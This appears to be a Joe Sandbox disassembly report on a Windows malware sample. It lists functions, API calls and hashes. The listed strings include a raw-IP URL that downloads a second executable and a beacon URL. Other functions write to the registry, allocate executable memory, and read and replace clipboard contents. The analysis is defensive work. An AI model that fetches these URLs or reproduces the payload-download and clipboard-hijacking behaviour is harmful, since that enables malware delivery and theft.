Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 024A003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024A024D

Strings

kernel32.dll, xrefs: 024A008F, 024A0095
cess, xrefs: 024A018D

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 47db5edc071913791deb89cbc8230648d4aa3d877f6c379e8469fc357dd10e18
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3C526974A01229DFDB64CF58C994BADBBB1BF09304F1480DAE94DAB351DB30AA95CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17
ShareScreen, xrefs: 00402C22

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 024A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,024A0223,?,?), ref: 024A0E19
SetErrorMode.KERNEL32(00000000,?,?,024A0223,?,?), ref: 024A0E1E

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 8cb0d109644ce714bdc84d03a3357bbc544987171c927014f260ece32c00e347
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 26D0123114512877DB002A94DC09BCE7B1CDF09B66F008011FB0DDD180C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 009DA115 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009DA166

Memory Dump Source

Source File: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d9000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9db950cec028cd4e82b14aa75b50917419a788d634cc80a9e2db556dcd600c95
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: EC113C79A40208EFDB01DF98C985E98BBF5AF08350F05C095F9489B362D371EA90DF91

Non-executed Functions

Function 024A1942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024A194D
Sleep.KERNEL32(00001541), ref: 024A1957

Part of subcall function 024ACE77: _strlen.LIBCMT ref: 024ACE8E

OpenClipboard.USER32(00000000), ref: 024A1984
GetClipboardData.USER32(00000001), ref: 024A1994
_strlen.LIBCMT ref: 024A19B0
_strlen.LIBCMT ref: 024A19DF
_strlen.LIBCMT ref: 024A1B23
EmptyClipboard.USER32 ref: 024A1B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 024A1B46
GlobalUnlock.KERNEL32(00000000), ref: 024A1B70
SetClipboardData.USER32(00000001,00000000), ref: 024A1B79
GlobalFree.KERNEL32(00000000), ref: 024A1B80
CloseClipboard.USER32 ref: 024A1BA4
Sleep.KERNEL32(000002D2), ref: 024A1BAF

Strings

i, xrefs: 024A19C0
4#E, xrefs: 024A195D

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 3ed04189f008729580de3e0b948b4ab9d441e2db8cadda207e324c32fea84cf1
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: E8512530C01394DAE3119FA8ED65BFD7774FF3A306F04522AD809A6172EB709681CB69

Function 024A2361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024A239C
GetClientRect.USER32(?,?), ref: 024A23B1
GetDC.USER32(?), ref: 024A23B8
CreateSolidBrush.GDI32(00646464), ref: 024A23CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024A23EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024A240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 024A2416
MulDiv.KERNEL32(00000008,00000000), ref: 024A241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024A2443
SetBkMode.GDI32(?,00000001), ref: 024A24CE
_wcslen.LIBCMT ref: 024A24E6

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

